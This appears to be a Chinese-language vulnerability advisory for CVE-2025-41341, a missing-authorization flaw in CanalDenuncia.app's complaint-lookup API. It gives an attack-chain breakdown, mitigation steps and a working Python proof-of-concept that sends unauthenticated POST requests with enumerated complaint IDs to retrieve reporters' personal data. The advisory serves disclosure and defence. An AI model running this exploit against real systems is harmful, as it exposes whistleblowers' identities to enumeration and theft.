CVE-2025-41341 CanalDenuncia.app 授权缺失漏洞导致用户信息泄露

漏洞信息

漏洞编号

CVE-2025-41341

漏洞类型

授权缺失/越权访问

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

CanalDenuncia.app

漏洞概述

CVE-2025-41341是发生在CanalDenuncia.app平台中的一个高危授权缺失漏洞（Broken Access Control）。该漏洞存在于后端API接口'/backend/api/buscarUsuarioByDenuncia.php'中，由于程序在设计时未对用户访问权限进行充分的验证，攻击者可以在无需任何认证的情况下，通过构造恶意的POST请求并指定目标用户的'id_denuncia'和'seguro'参数值，即可非法获取其他用户的敏感信息。CVSS 3.1评分达到7.5分，主要影响系统的机密性，评级为高（H）。该漏洞的利用不需要任何认证凭证，也无需用户交互，攻击者可从互联网远程发起攻击。漏洞由INCIBE-CERT的CVE协调团队（[email protected]）发现并披露。由于该应用主要用于举报管理，泄露的用户信息可能包括举报人的个人身份信息、举报内容详情等敏感数据，对用户隐私造成严重威胁。建议受影响的组织尽快采取修复措施，防止敏感信息被非法获取。

技术细节

漏洞根源在于CanalDenuncia.app的后端API接口'/backend/api/buscarUsuarioByDenuncia.php'缺乏适当的授权检查机制。具体而言，该接口在处理用户信息查询请求时，仅依赖客户端提交的'id_denuncia'（举报ID）和'seguro'（安全标识）参数来定位和返回用户数据，而未验证请求发起者是否具有访问该举报相关用户信息的合法权限。攻击者可以通过枚举或猜测有效的'id_denuncia'值，结合任意的'seguro'参数值，向该接口发送POST请求。服务器端代码在接收到请求后，未进行权限校验即直接查询数据库并返回对应的用户信息，导致发生垂直越权访问。此外，由于该接口不要求任何认证（PR:N为N），攻击者可以直接从网络发起请求而无需获取任何有效会话或凭据。这种设计缺陷使得任何互联网用户都能批量获取系统中举报人的个人信息，包括但不限于姓名、联系方式、地址等敏感数据。修复方案应在服务端实现基于当前登录用户角色的访问控制，确保用户只能访问自己有权查看的举报信息。

攻击链分析

STEP 1

步骤1 - 信息收集

攻击者首先识别目标应用CanalDenuncia.app，并确定其后端API接口'/backend/api/buscarUsuarioByDenuncia.php'的存在

STEP 2

步骤2 - 构造恶意请求

攻击者构造POST请求，包含'id_denuncia'（目标举报ID）和'seguro'参数。由于漏洞特性，这些参数值可以被枚举或猜测

STEP 3

步骤3 - 发送未授权请求

攻击者直接向目标接口发送POST请求，无需提供任何认证凭证（cookie、token等），因为接口未验证用户身份

STEP 4

步骤4 - 获取敏感信息

服务器在接收到请求后，由于缺乏授权检查，直接根据请求参数查询数据库并返回对应举报的用户个人信息

STEP 5

步骤5 - 数据利用

攻击者获取到用户敏感信息后，可用于进一步攻击、身份盗窃、敲诈勒索或出售给第三方等恶意目的

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-41341 PoC - CanalDenuncia.app Authorization Bypass
# Description: Lack of authorization in /backend/api/buscarUsuarioByDenuncia.php
# allows attackers to access other users' information via POST parameters

def exploit(target_url, id_denuncia, seguro="1"):
    """
    Exploit the authorization bypass vulnerability
    
    Args:
        target_url: Base URL of the vulnerable application
        id_denuncia: The complaint ID to query (integer)
        seguro: Security parameter (default: "1")
    
    Returns:
        Response from the server containing user information
    """
    endpoint = f"{target_url}/backend/api/buscarUsuarioByDenuncia.php"
    
    # Construct POST payload with required parameters
    payload = {
        'id_denuncia': id_denuncia,
        'seguro': seguro
    }
    
    # Send POST request without authentication
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        print(f"[*] Sending request to: {endpoint}")
        print(f"[*] Payload: id_denuncia={id_denuncia}, seguro={seguro}")
        
        response = requests.post(endpoint, data=payload, headers=headers, timeout=10)
        
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response:\n{response.text}")
        
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def main():
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <id_denuncia>")
        print(f"Example: python {sys.argv[0]} https://vulnerable-site.com 123")
        sys.exit(1)
    
    target_url = sys.argv[1].rstrip('/')
    id_denuncia = sys.argv[2]
    
    print("=" * 60)
    print("CVE-2025-41341 PoC - CanalDenuncia.app Authorization Bypass")
    print("=" * 60)
    
    # Try with different seguro values
    for seguro_value in ['1', 'true', 'yes', '0']:
        print(f"\n[*] Testing with seguro={seguro_value}")
        exploit(target_url, id_denuncia, seguro_value)

if __name__ == "__main__":
    main()

影响范围

CanalDenuncia.app (all versions before patch)

防御指南

临时缓解措施

在官方修复补丁发布之前，建议采取以下临时缓解措施：1）限制或关闭/buscarUsuarioByDenuncia.php接口的公网访问，仅允许受信任的内部网络访问；2）配置Web应用防火墙（WAF）规则，监控和阻止异常的POST请求模式；3）实施IP黑名单机制，阻止已知的恶意来源；4）增强日志监控，对该接口的所有访问请求进行记录和告警；5）考虑临时下线该功能模块，待官方修复后再重新启用；6）通知可能受影响的用户，提醒其注意个人信息保护。同时建议密切关注INCIBE-CERT和厂商发布的安全公告，及时获取官方修复补丁。